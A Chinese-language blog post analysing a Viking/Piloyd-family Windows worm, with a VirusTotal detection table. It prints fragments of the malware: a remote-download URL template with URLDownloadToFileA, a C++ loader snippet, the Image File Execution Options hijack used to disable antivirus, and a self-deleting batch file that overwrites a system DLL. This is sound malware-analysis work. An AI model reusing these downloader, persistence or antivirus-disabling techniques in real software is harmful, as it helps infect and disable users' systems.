起初啟動Expor.exe,透過Expor.exe,間接隨機生成調用xmlprov.dll,ntmssvc.dll,mspmsnsv.dll,tapisrv.dll,
最後加載驅動並將常規防毒軟體、工具關閉(如360),
好奇為什麼殺不太掉,於是看了下,
映像劫持,禁用默認下的防毒軟體、工具,
無故加載 Expor.exe, c:\windows\system32\xmlprov.dll ,找可疑程式、驅動結果找不太到,
後來將xmlprov.dll dump下來看看,
%s%s%d.exe,http://%s/%s/%s.exe,URLDownloadToFile,
URLDownloadToFileA();
不知道去某OO地方下載某些木馬&病毒再次進行感染,
C++語法大概像
HINSTANCE hInstance = ::LoadLibrary( "urlmon.dll" );
::GetProcAddress(hInstance,"URLDownloadToFileA");
::GetProcAddress(hInstance,"URLDownloadToFileA");
類似downloader行為,而前面為下載地址,這裡就帶過,
virus透過reg進行映像劫持
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
並感染exe,htm,html,asp,aspx,rar,
還會生成這隻Rar.exe後執行,並生成dll進行感染,
架構與Expor.exe類似,
if(![Rar.exe])//not exist
{
create [Rar.exe];
open [Rar.exe];
}Rar.exe和Expor.exe差別在於Expor.exe執行後自我刪除,
在調用這塊lsasvc.dll同時除了生成Expor.exe之外,另外生成loopt.bat,
loopt.bat批處理如下
copy /Y "C:\windows\TEMP\Expor.exe" "C:\windows\system32\dllcache\lsasvc.dll"
:runagaindel "C:\windows\TEMP\Expor.exe"
if exist "C:\windows\TEMP\Expor.exe" goto runagain
del "C:\windows\TEMP\Loopt.bat"
把Expor.exe copy到lsasvc.dll ,用copy帶Y參數,將其默認複製進去,
執行後再將 loopt.bat Delete,
這就是微軟以外驅動都確認過,為何還是刪不掉的可能問題,
dll看完索性也看下Expor.exe,
EIP:0x00401CA0,OEP:0x00401838,
加了一層殼,dump後IAT修復,PEiD=Microsoft Visual C++ 6.0,
直接丟Virustotal看下有沒收穫,
| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AhnLab-V3 | 2011.01.16.00 | 2011.01.16 | - |
| AntiVir | 7.11.1.163 | 2011.01.17 | W32/Agent.DP |
| Antiy-AVL | 2.0.3.7 | 2011.01.17 | Worm/Win32.Piloyd.gen |
| Avast | 4.8.1351.0 | 2011.01.17 | Win32:Viking-CF |
| Avast5 | 5.0.677.0 | 2011.01.17 | Win32:Viking-CF |
| AVG | 10.0.0.1190 | 2011.01.17 | Worm/Generic.APDT |
| BitDefender | 7.2 | 2011.01.17 | Trojan.Viking.A |
| CAT-QuickHeal | 11.00 | 2011.01.17 | I-Worm.Piloyd.p |
| ClamAV | 0.96.4.0 | 2011.01.17 | Worm.Piloyd-2 |
| Command | 5.2.11.5 | 2011.01.16 | W32/Downloader.C.gen!Eldorado |
| Comodo | 7420 | 2011.01.17 | TrojWare.Win32.TrojanDownloader.Agent.~EBX |
| DrWeb | 5.0.2.03300 | 2011.01.17 | Win32.HLLW.Autoruner.8265 |
| eSafe | 7.0.17.0 | 2011.01.17 | - |
| eTrust-Vet | 36.1.8104 | 2011.01.17 | - |
| F-Prot | 4.6.2.117 | 2011.01.16 | W32/Downloader.C.gen!Eldorado |
| F-Secure | 9.0.16160.0 | 2011.01.17 | Trojan.Viking.A |
| Fortinet | 4.2.254.0 | 2011.01.16 | W32/Piloyd.M |
| GData | 21 | 2011.01.17 | Trojan.Viking.A |
| Ikarus | T3.1.1.97.0 | 2011.01.17 | Trojan-Downloader.Win32.Jadtre |
| Jiangmin | 13.0.900 | 2011.01.17 | Worm/Piloyd.e |
| K7AntiVirus | 9.77.3565 | 2011.01.17 | Trojan-Downloader |
| McAfee | 5.400.0.1158 | 2011.01.17 | W32/Fujacks.worm |
| McAfee-GW-Edition | 2010.1C | 2011.01.17 | Heuristic.BehavesLike.Win32.Downloader.H |
| Microsoft | 1.6402 | 2011.01.17 | TrojanDownloader:Win32/Jadtre.A |
| NOD32 | 5795 | 2011.01.17 | Win32/AutoRun.AntiAV.Q |
| Norman | 6.06.12 | 2011.01.17 | - |
| nProtect | 2011-01-17.01 | 2011.01.17 | Worm/W32.Piloyd.81920 |
| Panda | 10.0.2.7 | 2011.01.17 | W32/Autorun.JLX.worm |
| PCTools | 7.0.3.5 | 2011.01.17 | - |
| Prevx | 3.0 | 2011.01.17 | Medium Risk Malware |
| Rising | 22.83.00.03 | 2011.01.17 | Win32.Agent.hg |
| Sophos | 4.61.0 | 2011.01.17 | W32/FuzVir-A |
| SUPERAntiSpyware | 4.40.0.1006 | 2011.01.17 | - |
| Symantec | 20101.3.0.103 | 2011.01.17 | - |
| TheHacker | 6.7.0.1.115 | 2011.01.14 | - |
| TrendMicro | 9.120.0.1004 | 2011.01.17 | WORM_PILOYD.A |
| TrendMicro-HouseCall | 9.120.0.1004 | 2011.01.17 | WORM_PILOYD.A |
| VBA32 | 3.12.14.2 | 2011.01.17 | Net-Worm.Win32.Piloyd.bg |
| VIPRE | 8102 | 2011.01.17 | - |
| ViRobot | 2011.1.17.4259 | 2011.01.17 | Worm.Win32.Net-Piloyd.81920 |
| VirusBuster | 13.6.151.0 | 2011.01.17 | - |
  後來發現uphclean.exe這程式也被感染並加載驅動(已被我關閉), 當下許多exe、html等等被感染,正將病毒代碼一一清除, 除了釋放dll,還會感染所有disk達到繁殖保護&反覆感染效果. |
| 最後配合Wsyscheck&360&江民的使用將它們dump下來當標本, 佩服作者的思路,有無驅動保護之下都能順利啟動&過大部分防毒軟體, 也從中學到不少東西  for 專題樣本之一 |
最後感謝virus作者,google & you. |
沒有留言:
張貼留言